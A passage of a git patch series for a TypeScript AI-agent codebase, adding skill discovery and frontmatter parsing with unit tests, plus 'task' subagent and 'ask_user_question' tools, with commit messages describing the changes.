expect(sb.access).toHaveBeenCalledWith("/skills/foo/SKILL.md"); + }); + + it("falls back to lowercase skill.md when SKILL.md is missing", async () => { + const sb = makeSandbox(["/skills/foo/skill.md"]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBe("/skills/foo/skill.md"); + }); + + it("returns null when neither casing exists", async () => { + const sb = makeSandbox([]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBeNull(); + }); +}); diff --git a/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts new file mode 100644 index 000000000..7833f2450 --- /dev/null +++ b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts @@ -0,0 +1,15 @@ +import { describe, it, expect } from "vitest"; +import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory"; + +describe("getGlobalSkillsDirectory", () => { + it("returns /.agents/skills", () => { + expect(getGlobalSkillsDirectory("/root")).toBe("/root/.agents/skills"); + expect(getGlobalSkillsDirectory("/home/vercel-sandbox")).toBe( + "/home/vercel-sandbox/.agents/skills", + ); + }); + + it("handles trailing slash on input", () => { + expect(getGlobalSkillsDirectory("/root/")).toBe("/root/.agents/skills"); + }); +}); diff --git a/lib/skills/__tests__/getSandboxSkillDirectories.test.ts b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts new file mode 100644 index 000000000..5762ccea1 --- /dev/null +++ b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts @@ -0,0 +1,23 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories"; +import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory"; + +vi.mock("@/lib/sandbox/resolveSandboxHomeDirectory", () => ({ + resolveSandboxHomeDirectory: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + 
+describe("getSandboxSkillDirectories", () => { + it("returns just the global skill dir under the resolved $HOME", async () => { + vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/home/vercel-sandbox"); + const dirs = await getSandboxSkillDirectories({ workingDirectory: "/sandbox/mono" } as never); + expect(dirs).toEqual(["/home/vercel-sandbox/.agents/skills"]); + }); + + it("works with the /root fallback (open-agents base image)", async () => { + vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/root"); + const dirs = await getSandboxSkillDirectories({ workingDirectory: "/x" } as never); + expect(dirs).toEqual(["/root/.agents/skills"]); + }); +}); diff --git a/lib/skills/__tests__/getSkills.test.ts b/lib/skills/__tests__/getSkills.test.ts new file mode 100644 index 000000000..8ffd47e24 --- /dev/null +++ b/lib/skills/__tests__/getSkills.test.ts @@ -0,0 +1,31 @@ +import { describe, it, expect } from "vitest"; +import { getSkills } from "@/lib/skills/getSkills"; + +const validCtx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +const sample = { + name: "recoup-api", + description: "Recoupable API skill", + path: "/home/vercel-sandbox/.agents/skills/recoup-api", + filename: "SKILL.md", + options: {}, +}; + +describe("getSkills", () => { + it("returns the skills array when present in a valid AgentContext", () => { + expect(getSkills({ ...validCtx, skills: [sample] })).toEqual([sample]); + }); + + it("returns [] when no skills field is set", () => { + expect(getSkills(validCtx)).toEqual([]); + }); + + it("returns [] for malformed contexts (non-AgentContext shape)", () => { + expect(getSkills(undefined)).toEqual([]); + expect(getSkills(null)).toEqual([]); + expect(getSkills({ noSandbox: true })).toEqual([]); + expect(getSkills({ sandbox: null })).toEqual([]); + }); +}); diff --git a/lib/skills/__tests__/injectSkillDirectory.test.ts b/lib/skills/__tests__/injectSkillDirectory.test.ts new file mode 100644 index 
000000000..ac6d646bb --- /dev/null +++ b/lib/skills/__tests__/injectSkillDirectory.test.ts @@ -0,0 +1,14 @@ +import { describe, it, expect } from "vitest"; +import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory"; + +describe("injectSkillDirectory", () => { + it("prepends a `Skill directory: ` header followed by a blank line", () => { + expect(injectSkillDirectory("body content", "/skills/foo")).toBe( + "Skill directory: /skills/foo\n\nbody content", + ); + }); + + it("works with empty body", () => { + expect(injectSkillDirectory("", "/skills/foo")).toBe("Skill directory: /skills/foo\n\n"); + }); +}); diff --git a/lib/skills/__tests__/parseSkillFrontmatter.test.ts b/lib/skills/__tests__/parseSkillFrontmatter.test.ts new file mode 100644 index 000000000..91dfcf7c1 --- /dev/null +++ b/lib/skills/__tests__/parseSkillFrontmatter.test.ts @@ -0,0 +1,56 @@ +import { describe, it, expect } from "vitest"; +import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter"; + +describe("parseSkillFrontmatter", () => { + it("parses a minimal frontmatter (name + description)", () => { + const md = `---\nname: commit\ndescription: Make a git commit\n---\n\nBody.`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.name).toBe("commit"); + expect(result.data.description).toBe("Make a git commit"); + }); + + it("unwraps double-quoted values (including escaped quotes)", () => { + const md = `---\nname: foo\ndescription: "Has \\"quotes\\" inside"\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe('Has "quotes" inside'); + }); + + it("parses booleans for unquoted true/false", () => { + const md = `---\nname: foo\ndescription: bar\ndisable-model-invocation: true\nuser-invocable: false\n---\nbody`; + const result = parseSkillFrontmatter(md); + 
expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data["disable-model-invocation"]).toBe(true); + expect(result.data["user-invocable"]).toBe(false); + }); + + it("treats `true`/`false` inside quotes as strings (not booleans)", () => { + const md = `---\nname: foo\ndescription: "true"\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe("true"); + }); + + it("returns success:false when frontmatter is missing", () => { + const result = parseSkillFrontmatter("just markdown, no frontmatter"); + expect(result.success).toBe(false); + }); + + it("returns success:false when required fields are absent", () => { + const result = parseSkillFrontmatter(`---\nname: only-name\n---\nbody`); + expect(result.success).toBe(false); + }); + + it("preserves colons in values (e.g. URLs)", () => { + const md = `---\nname: foo\ndescription: see https://example.com\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe("see https://example.com"); + }); +}); diff --git a/lib/skills/__tests__/substituteArguments.test.ts b/lib/skills/__tests__/substituteArguments.test.ts new file mode 100644 index 000000000..db4fb0aa9 --- /dev/null +++ b/lib/skills/__tests__/substituteArguments.test.ts @@ -0,0 +1,22 @@ +import { describe, it, expect } from "vitest"; +import { substituteArguments } from "@/lib/skills/substituteArguments"; + +describe("substituteArguments", () => { + it("replaces $ARGUMENTS with the provided args", () => { + expect(substituteArguments("run with $ARGUMENTS", "--flag value")).toBe( + "run with --flag value", + ); + }); + + it("replaces all occurrences", () => { + expect(substituteArguments("$ARGUMENTS / $ARGUMENTS", "x")).toBe("x / x"); + }); + + it("substitutes empty string when args are undefined", () => { + 
expect(substituteArguments("run with $ARGUMENTS", undefined)).toBe("run with "); + }); + + it("leaves text unchanged when $ARGUMENTS is absent", () => { + expect(substituteArguments("no placeholder here", "ignored")).toBe("no placeholder here"); + }); +}); diff --git a/lib/skills/discoverSkills.ts b/lib/skills/discoverSkills.ts new file mode 100644 index 000000000..9ae0ced67 --- /dev/null +++ b/lib/skills/discoverSkills.ts @@ -0,0 +1,89 @@ +import * as path from "path"; +import type { Sandbox } from "@/lib/sandbox/interface"; +import { findSkillFile } from "@/lib/skills/findSkillFile"; +import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter"; +import { frontmatterToOptions, type SkillMetadata } from "@/lib/skills/skillTypes"; + +/** + * Built-in commands that skills cannot shadow. Skills with these names + * would be unreachable via slash command, so we drop them at discovery. + */ +const BUILTIN_COMMANDS = ["model", "resume", "new"]; + +/** + * Scan a list of directories for skills. Each directory is expected to + * contain one subdirectory per skill, with a SKILL.md (or skill.md) + * inside. Returns metadata for everything discoverable; silently skips + * non-directories, missing files, malformed frontmatter, and names that + * shadow built-in slash commands. + * + * Dedupes by name (case-insensitive); first-wins across directories so + * callers can list project skills before global skills and have project + * shadow global. + * + * @param sandbox - Connected sandbox for file ops. + * @param directories - Absolute paths to scan. 
+ */ +export async function discoverSkills( + sandbox: Sandbox, + directories: string[], +): Promise { + const skills: SkillMetadata[] = []; + const seen = new Set(); + + for (const dir of directories) { + try { + const stat = await sandbox.stat(dir); + if (!stat.isDirectory()) continue; + } catch { + continue; // directory doesn't exist + } + + let entries; + try { + entries = await sandbox.readdir(dir, { withFileTypes: true }); + } catch { + continue; + } + + for (const entry of entries) { + if (!entry.isDirectory()) continue; + + const skillDir = path.join(dir, entry.name); + const skillFile = await findSkillFile(sandbox, skillDir); + if (!skillFile) continue; + + let content: string; + try { + content = await sandbox.readFile(skillFile, "utf-8"); + } catch { + continue; + } + + const parsed = parseSkillFrontmatter(content); + if (!parsed.success) continue; + const frontmatter = parsed.data; + + if (BUILTIN_COMMANDS.includes(frontmatter.name.toLowerCase())) { + console.warn( + `[discoverSkills] Skipping "${frontmatter.name}" in ${skillDir} — name shadows built-in /${frontmatter.name}`, + ); + continue; + } + + const normalized = frontmatter.name.toLowerCase(); + if (seen.has(normalized)) continue; + seen.add(normalized); + + skills.push({ + name: frontmatter.name, + description: frontmatter.description, + path: skillDir, + filename: path.basename(skillFile), + options: frontmatterToOptions(frontmatter), + }); + } + } + + return skills; +} diff --git a/lib/skills/extractSkillBody.ts b/lib/skills/extractSkillBody.ts new file mode 100644 index 000000000..d1dcb3f5e --- /dev/null +++ b/lib/skills/extractSkillBody.ts @@ -0,0 +1,14 @@ +/** + * Strip the YAML frontmatter from a SKILL.md file and return just the + * markdown body. Returns the entire content (trimmed) when no + * frontmatter is present. + * + * @param fileContent - Full file content read from sandbox. 
+ */ +export function extractSkillBody(fileContent: string): string { + const match = fileContent.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/); + if (match) { + return fileContent.slice(match[0].length).trim(); + } + return fileContent.trim(); +} diff --git a/lib/skills/findSkillFile.ts b/lib/skills/findSkillFile.ts new file mode 100644 index 000000000..a81b9e415 --- /dev/null +++ b/lib/skills/findSkillFile.ts @@ -0,0 +1,33 @@ +import * as path from "path"; +import type { Sandbox } from "@/lib/sandbox/interface"; + +/** + * Locate the SKILL.md file inside a candidate skill directory. Prefers + * uppercase `SKILL.md` (the project convention) but falls back to + * lowercase `skill.md` for skills that ship the lowercase name. Returns + * `null` when neither file exists so callers can skip the entry. + * + * Probes via `sandbox.access` (which throws on missing) rather than + * `readdir` so we don't pay the cost of listing a directory whose + * contents we don't otherwise need. + * + * @param sandbox - Connected sandbox handle. + * @param skillDir - Absolute path to the candidate skill directory. + */ +export async function findSkillFile(sandbox: Sandbox, skillDir: string): Promise { + const uppercase = path.join(skillDir, "SKILL.md"); + const lowercase = path.join(skillDir, "skill.md"); + + try { + await sandbox.access(uppercase); + return uppercase; + } catch { + // try lowercase + } + try { + await sandbox.access(lowercase); + return lowercase; + } catch { + return null; + } +} diff --git a/lib/skills/getGlobalSkillsDirectory.ts b/lib/skills/getGlobalSkillsDirectory.ts new file mode 100644 index 000000000..788a6dfc7 --- /dev/null +++ b/lib/skills/getGlobalSkillsDirectory.ts @@ -0,0 +1,14 @@ +import * as path from "path"; + +/** + * Resolve the absolute path to the global skills directory under a + * given `$HOME`. This is where `installSessionGlobalSkills` lays down + * skills at sandbox provisioning time via `npx skills add ... 
-g` + * (today: `recoup-api`, `artist-workspace`). + * + * @param homeDirectory - The sandbox's resolved $HOME (e.g. + * `/home/vercel-sandbox`, or `/root` on the open-agents base image). + */ +export function getGlobalSkillsDirectory(homeDirectory: string): string { + return path.posix.join(homeDirectory, ".agents", "skills"); +} diff --git a/lib/skills/getSandboxSkillDirectories.ts b/lib/skills/getSandboxSkillDirectories.ts new file mode 100644 index 000000000..81645ea46 --- /dev/null +++ b/lib/skills/getSandboxSkillDirectories.ts @@ -0,0 +1,16 @@ +import type { Sandbox } from "@/lib/sandbox/interface"; +import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory"; +import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory"; + +/** + * Resolve the directory list to scan when discovering skills for a + * sandbox. Currently just one path — `${HOME}/.agents/skills/` — + * because all skills are provisioned globally at sandbox startup via + * `installSessionGlobalSkills` rather than bundled into the cloned repo. + * + * @param sandbox - Connected sandbox handle. + */ +export async function getSandboxSkillDirectories(sandbox: Sandbox): Promise { + const homeDirectory = await resolveSandboxHomeDirectory(sandbox); + return [getGlobalSkillsDirectory(homeDirectory)]; +} diff --git a/lib/skills/getSkills.ts b/lib/skills/getSkills.ts new file mode 100644 index 000000000..d2d29ed7d --- /dev/null +++ b/lib/skills/getSkills.ts @@ -0,0 +1,22 @@ +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; + +/** + * Read the discovered skill catalog out of the agent's + * `experimental_context`. The catalog is populated by the chat handler + * via `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))` + * before workflow start, then threaded through as + * `AgentContext.skills`. 
Returns `[]` when the context shape is wrong + * or no skills were discovered. + * + * Lives in its own file so consumers (the `skill` tool today, future + * skill-aware system prompts tomorrow) share one accessor instead of + * each reimplementing the context-cast. + * + * @param experimental_context - Opaque context object passed by AI SDK to tool execute. + */ +export function getSkills(experimental_context: unknown): SkillMetadata[] { + if (!isAgentContext(experimental_context)) return []; + const ctx = experimental_context as { skills?: SkillMetadata[] }; + return ctx.skills ?? []; +} diff --git a/lib/skills/injectSkillDirectory.ts b/lib/skills/injectSkillDirectory.ts new file mode 100644 index 000000000..cf4bf58d5 --- /dev/null +++ b/lib/skills/injectSkillDirectory.ts @@ -0,0 +1,11 @@ +/** + * Prepend a `Skill directory: ` header to a skill body + * so the model can construct full paths to scripts and resources living + * alongside SKILL.md (e.g. `${skillDir}/scripts/check.sh`). + * + * @param body - Skill body (after frontmatter strip). + * @param skillDir - Absolute sandbox path to the skill directory. + */ +export function injectSkillDirectory(body: string, skillDir: string): string { + return `Skill directory: ${skillDir}\n\n${body}`; +} diff --git a/lib/skills/parseSkillFrontmatter.ts b/lib/skills/parseSkillFrontmatter.ts new file mode 100644 index 000000000..3d2888d76 --- /dev/null +++ b/lib/skills/parseSkillFrontmatter.ts @@ -0,0 +1,52 @@ +import { skillFrontmatterSchema } from "@/lib/skills/skillTypes"; + +/** + * Parse YAML frontmatter from SKILL.md content. Returns the Zod + * `safeParse` shape so callers can branch cleanly on success. + * + * Intentionally a hand-rolled subset of YAML (one-line `key: value` + * with `"…"` / `'…'` quoting + unquoted `true`/`false`) so we don't + * pull a YAML dep just to read a 3-line block. + * + * @param content - Full SKILL.md content (including the leading `---`). 
+ */ +export function parseSkillFrontmatter( + content: string, +): ReturnType { + const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/); + if (!match?.[1]) { + return { + success: false, + error: new Error("No frontmatter found") as never, + }; + } + + const yaml = match[1]; + const parsed: Record = {}; + + for (const line of yaml.split("\n")) { + const trimmed = line.trim(); + if (!trimmed || trimmed.startsWith("#")) continue; + + const colonIndex = trimmed.indexOf(":"); + if (colonIndex === -1) continue; + + const key = trimmed.slice(0, colonIndex).trim(); + // Only split on the first colon so values like URLs stay intact. + let value: string | boolean = trimmed.slice(colonIndex + 1).trim(); + + if (value.startsWith('"') && value.endsWith('"')) { + value = value.slice(1, -1).replace(/\\"/g, '"'); + } else if (value.startsWith("'") && value.endsWith("'")) { + value = value.slice(1, -1).replace(/\\'/g, "'"); + } else if (value === "true") { + value = true; + } else if (value === "false") { + value = false; + } + + parsed[key] = value; + } + + return skillFrontmatterSchema.safeParse(parsed); +} diff --git a/lib/skills/skillTypes.ts b/lib/skills/skillTypes.ts new file mode 100644 index 000000000..77fffd055 --- /dev/null +++ b/lib/skills/skillTypes.ts @@ -0,0 +1,76 @@ +import { z } from "zod"; + +/** + * Zod schema for skill frontmatter YAML validation. Defines the + * expected structure at the top of SKILL.md files. 
+ */ +export const skillFrontmatterSchema = z.object({ + name: z.string().min(1, "Skill name cannot be empty").describe("Unique name of the skill"), + description: z + .string() + .min(1, "Skill description cannot be empty") + .describe("Short description for the agent"), + version: z.string().optional().describe("Skill version"), + "disable-model-invocation": z + .boolean() + .optional() + .describe("If true, the model cannot invoke this skill automatically"), + "user-invocable": z + .boolean() + .optional() + .describe("If false, users cannot invoke this skill via slash command"), + "allowed-tools": z + .string() + .optional() + .describe("Comma-separated list of allowed tools when skill is active"), + context: z.enum(["fork"]).optional().describe("Execution context for the skill"), + agent: z.string().optional().describe("Agent type to use for execution"), +}); + +export type SkillFrontmatter = z.infer; + +/** + * Normalized skill options derived from frontmatter — camelCase fields, + * comma-separated lists pre-split. + */ +export interface SkillOptions { + disableModelInvocation?: boolean; + userInvocable?: boolean; + allowedTools?: string[]; + context?: "fork"; + agent?: string; +} + +/** + * Skill metadata stored on `AgentContext.skills`. Contains only what + * `skillTool` needs at invocation time — the SKILL.md body is loaded + * lazily. + */ +export interface SkillMetadata { + /** Unique name of the skill. */ + name: string; + /** Short description for the agent. */ + description: string; + /** Absolute sandbox path to the skill directory. */ + path: string; + /** Filename of the skill file (`SKILL.md` or `skill.md`). */ + filename: string; + /** Skill options from frontmatter. */ + options: SkillOptions; +} + +/** + * Normalize parsed frontmatter to {@link SkillOptions}. 
+ */ +export function frontmatterToOptions(frontmatter: SkillFrontmatter): SkillOptions { + return { + disableModelInvocation: frontmatter["disable-model-invocation"], + userInvocable: frontmatter["user-invocable"], + allowedTools: frontmatter["allowed-tools"] + ?.split(",") + .map(t => t.trim()) + .filter(Boolean), + context: frontmatter.context, + agent: frontmatter.agent, + }; +} diff --git a/lib/skills/substituteArguments.ts b/lib/skills/substituteArguments.ts new file mode 100644 index 000000000..44500bc58 --- /dev/null +++ b/lib/skills/substituteArguments.ts @@ -0,0 +1,19 @@ +/** + * Replace all occurrences of `$ARGUMENTS` in a skill body with the + * provided args string (or empty string when no args were passed). + * + * The args are inserted verbatim: a replacer function is used so `$` + * sequences in args (`$&`, `$$`, `$'`, ...) are not expanded as + * replacement patterns by `String.prototype.replace`. + * + * Used by `skillTool` after loading SKILL.md so slash-command-style + * invocations like `/commit -m "fix"` thread the arg suffix through to + * the skill's body text. + * + * @param body - Skill body (markdown after frontmatter). + * @param args - Optional arguments passed by the model. + */ +export function substituteArguments(body: string, args?: string): string { + const replacement = args ?? ""; + return body.replace(/\$ARGUMENTS/g, () => replacement); +} From b36aa5846115cc30f18bc317aba2fca34fa431b5 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 17:45:47 -0500 Subject: [PATCH 06/10] feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). 
streamText halts after emitting the tool-call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-`streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool.
Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 25 ++- app/lib/workflows/runAgentWorkflow.ts | 9 +- lib/agent/__tests__/buildAgentTools.test.ts | 26 ++-- lib/agent/buildAgentTools.ts | 27 +++- lib/agent/tools/AgentContext.ts | 35 ++++- .../__tests__/askUserQuestionTool.test.ts | 111 +++++++++++++ lib/agent/tools/__tests__/taskTool.test.ts | 146 ++++++++++++++++++ lib/agent/tools/askUserQuestionTool.ts | 90 +++++++++++ lib/agent/tools/buildSubagentTools.ts | 32 ++++ lib/agent/tools/getMainModel.ts | 26 ++++ lib/agent/tools/getSubagentModel.ts | 24 +++ lib/agent/tools/taskTool.ts | 122 +++++++++++++++ 12 files changed, 644 insertions(+), 29 deletions(-) create mode 100644 lib/agent/tools/__tests__/askUserQuestionTool.test.ts create mode 100644 lib/agent/tools/__tests__/taskTool.test.ts create mode 100644 lib/agent/tools/askUserQuestionTool.ts create mode 100644 lib/agent/tools/buildSubagentTools.ts create mode 100644 lib/agent/tools/getMainModel.ts create mode 100644 lib/agent/tools/getSubagentModel.ts create mode 100644 lib/agent/tools/taskTool.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 704035c64..b487285dc 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -3,17 +3,21 @@ import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; -import type { AgentContext } from "@/lib/agent/tools/AgentContext"; +import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentStepInput = { messages: 
UIMessage[]; modelId: string; writable: WritableStream; /** - * Threaded into `streamText`'s `experimental_context` so each tool's - * `execute` callback can read the sandbox state + per-prompt context. + * The JSON-serializable agent context that survives the durable + * workflow input. `runAgentStep` widens it into a full `AgentContext` + * by attaching `model` (and optionally `subagentModel`) before + * threading into `streamText`'s `experimental_context`. Mirrors + * open-agents' prepareCall pattern, where the constructed callModel + * is added to `experimental_context` right before each model call. */ - agentContext: AgentContext; + agentContext: DurableAgentContext; }; /** @@ -43,13 +47,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe const modelMessages = convertToModelMessages(input.messages); const tools = buildAgentTools({ skills: input.agentContext.skills }); + // Construct the model here (not in the workflow input) — LanguageModel + // instances aren't JSON-serializable and can't ride durable inputs. + // Then attach to AgentContext so tools see the same model the parent + // is using, matching open-agents' `prepareCall` pattern. 
+ const callModel = gateway(input.modelId); + const agentContext: AgentContext = { + ...input.agentContext, + model: callModel, + }; const result = streamText({ - model: gateway(input.modelId), + model: callModel, system: agentCustomInstructions, messages: modelMessages, tools, stopWhen: CHAT_AGENT_STOP_WHEN, - experimental_context: input.agentContext, + experimental_context: agentContext, }); // Acquire the writer once and release in `finally` so a thrown chunk diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts index ce65b0bb3..3a0965342 100644 --- a/app/lib/workflows/runAgentWorkflow.ts +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -1,7 +1,7 @@ import { getWritable } from "workflow"; import type { UIMessage, UIMessageChunk } from "ai"; import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; -import type { AgentContext } from "@/lib/agent/tools/AgentContext"; +import type { DurableAgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentWorkflowInput = { messages: UIMessage[]; @@ -9,10 +9,11 @@ export type RunAgentWorkflowInput = { sessionId: string; modelId: string; /** - * Threaded into `streamText`'s `experimental_context` so tools (bash et al.) - * can read sandbox state + per-prompt Recoup creds. + * JSON-serializable subset of AgentContext that survives the durable + * workflow input. `runAgentStep` attaches the constructed `model` + * before threading into `streamText`'s `experimental_context`. 
*/ - agentContext: AgentContext; + agentContext: DurableAgentContext; }; /** diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index fb5d99a5a..e684818f2 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,7 +1,7 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; -const BASE_TOOLS = [ +const ALWAYS_PRESENT = [ "bash", "read", "write", @@ -10,18 +10,20 @@ const BASE_TOOLS = [ "glob", "todo_write", "web_fetch", + "task", + "ask_user_question", ] as const; describe("buildAgentTools", () => { - it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => { + it("registers the 10 always-on tools by default", () => { const tools = buildAgentTools(); - for (const name of BASE_TOOLS) { + for (const name of ALWAYS_PRESENT) { expect(tools).toHaveProperty(name); } expect(tools).not.toHaveProperty("skill"); }); - it("registers the skill tool when a non-empty skill catalog is provided", () => { + it("conditionally adds `skill` when a non-empty skill catalog is provided", () => { const tools = buildAgentTools({ skills: [ { @@ -34,17 +36,17 @@ describe("buildAgentTools", () => { ], }); expect(tools).toHaveProperty("skill"); - for (const name of BASE_TOOLS) { + for (const name of ALWAYS_PRESENT) { expect(tools).toHaveProperty(name); } }); - it("omits the skill tool when an empty array is passed", () => { + it("omits `skill` when an empty array is passed", () => { const tools = buildAgentTools({ skills: [] }); expect(tools).not.toHaveProperty("skill"); }); - it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => { + it("each tool exposes the AI SDK shape (description + inputSchema)", () => { const tools = buildAgentTools({ skills: [ { @@ -55,12 +57,16 @@ describe("buildAgentTools", () => { options: {}, }, ], - }) as Record; - for (const name of 
[...BASE_TOOLS, "skill"]) { + }) as Record; + for (const name of [...ALWAYS_PRESENT, "skill"]) { const t = tools[name]!; expect(typeof t.description).toBe("string"); expect(t.inputSchema).toBeDefined(); - expect(typeof t.execute).toBe("function"); } }); + + it("`ask_user_question` has no server execute (client-side tool)", () => { + const tools = buildAgentTools() as Record; + expect(tools.ask_user_question?.execute).toBeUndefined(); + }); }); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index 393b32889..728334b11 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -1,3 +1,4 @@ +import { askUserQuestionTool } from "@/lib/agent/tools/askUserQuestionTool"; import { bashTool } from "@/lib/agent/tools/bashTool"; import { readFileTool } from "@/lib/agent/tools/readFileTool"; import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; @@ -7,6 +8,7 @@ import { globTool } from "@/lib/agent/tools/globTool"; import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; import { skillTool } from "@/lib/agent/tools/skillTool"; +import { taskTool } from "@/lib/agent/tools/taskTool"; import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** @@ -14,13 +16,24 @@ import type { SkillMetadata } from "@/lib/skills/skillTypes"; * Each tool reads its sandbox handle + per-prompt context from * `experimental_context` at execute time — the factory is otherwise stateless. 
